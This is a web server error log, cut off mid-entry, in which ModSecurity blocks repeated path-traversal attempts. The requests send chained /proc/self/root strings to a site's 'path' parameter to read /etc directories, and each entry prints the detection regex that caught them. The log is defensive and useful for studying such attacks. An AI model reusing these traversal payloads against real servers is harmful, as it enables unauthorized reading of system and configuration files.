[Fri Mar 20 07:01:47.667409 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.243.128:43466] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0bCxCii7xarUs8iHZbFwAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:50.688663 2026] [:error] [pid 9818:tid 140411649607424] [client 74.7.243.128:43470] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0bDl1pVZ5mVmJwsFMiwgAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:52.878410 2026] [:error] [pid 31215:tid 140411741927168] [client 74.7.243.128:52288] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0bDwF0L0L-SsrnPo5bswAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:56.523952 2026] [mime_magic:error] [pid 11167:tid 140411708356352] (70014)End of file found: [client 57.141.18.114:57322] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:01:58.667827 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.243.128:52292] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0bFjJ3M9BSuKP7CAYM5wAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:03:59.542917 2026] [mime_magic:error] [pid 11167:tid 140411683178240] (70014)End of file found: [client 216.73.216.191:33216] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:04:17.383972 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:48812] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0boeoXxyEfFpUF8f91nwAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:04:22.006886 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.243.128:48826] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0bpjJ3M9BSuKP7CAYNhwAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:04:27.036393 2026] [:error] [pid 11642:tid 140411574073088] [client 74.7.243.128:42728] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0bq7ninkcc-iUj5ApSwwAAA5Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:04:49.023852 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:42734] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0bwda6ubjKNq_cu4bHTQAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:05:10.028880 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:58518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0b1uoXxyEfFpUF8f910wAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:05:34.119373 2026] [:error] [pid 11642:tid 140411725141760] [client 74.7.243.128:50050] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0b7rninkcc-iUj5ApTMgAAA4I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:05:40.820301 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:44984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0b9OoXxyEfFpUF8f91_AAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:05:58.419021 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.243.128:52128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0cBvXLqtnMIWvjpaKOcgAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:06:05.070683 2026] [mime_magic:error] [pid 15826:tid 140411666392832] (70014)End of file found: [client 57.141.18.103:39184] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:06:16.062294 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.243.128:43514] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0cGPXLqtnMIWvjpaKOlwAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:06:44.610642 2026] [mime_magic:error] [pid 15826:tid 140411699963648] (70014)End of file found: [client 57.141.18.52:41034] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:06:59.546939 2026] [:error] [pid 11642:tid 140411683178240] [client 74.7.243.128:47172] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0cQ7ninkcc-iUj5ApTnQAAA4c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:07:05.953379 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:57120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0cSda6ubjKNq_cu4bH8QAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:07:40.078686 2026] [mime_magic:error] [pid 31215:tid 140411708356352] (70014)End of file found: [client 74.7.243.128:57134] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/usr/lib
[Fri Mar 20 07:08:11.309892 2026] [mime_magic:error] [pid 31215:tid 140411691570944] (70014)End of file found: [client 57.141.18.72:45722] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:08:22.052251 2026] [mime_magic:error] [pid 11642:tid 140411649607424] (70014)End of file found: [client 216.73.216.191:46636] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:08:39.646178 2026] [mime_magic:error] [pid 7235:tid 140411582465792] (70014)End of file found: [client 216.73.216.191:47746] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:08:49.425899 2026] [mime_magic:error] [pid 10189:tid 140411649607424] (70014)End of file found: [client 57.141.18.23:48334] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:09:23.682112 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:40982] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0c09a6ubjKNq_cu4bI9wAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:09:53.543677 2026] [mime_magic:error] [pid 11167:tid 140411725141760] (70014)End of file found: [client 216.73.216.191:51938] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:10:13.120992 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.243.128:38108] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0dBTJ3M9BSuKP7CAYPbwAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:10:18.733284 2026] [mime_magic:error] [pid 7235:tid 140411624429312] (70014)End of file found: [client 216.73.216.191:53024] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:11:00.831650 2026] [mime_magic:error] [pid 11167:tid 140411666392832] (70014)End of file found: [client 57.141.18.121:55018] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:11:08.179066 2026] [:error] [pid 11167:tid 140411590858496] [client 74.7.243.128:37890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0dPPHIg5MgXLBnicPuNwAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:11:28.893823 2026] [mime_magic:error] [pid 26799:tid 140411548894976] (70014)End of file found: [client 216.73.216.191:65073] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:11:32.259681 2026] [mime_magic:error] [pid 11642:tid 140411716749056] (70014)End of file found: [client 216.73.216.191:34347] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:11:35.343138 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.243.128:40134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 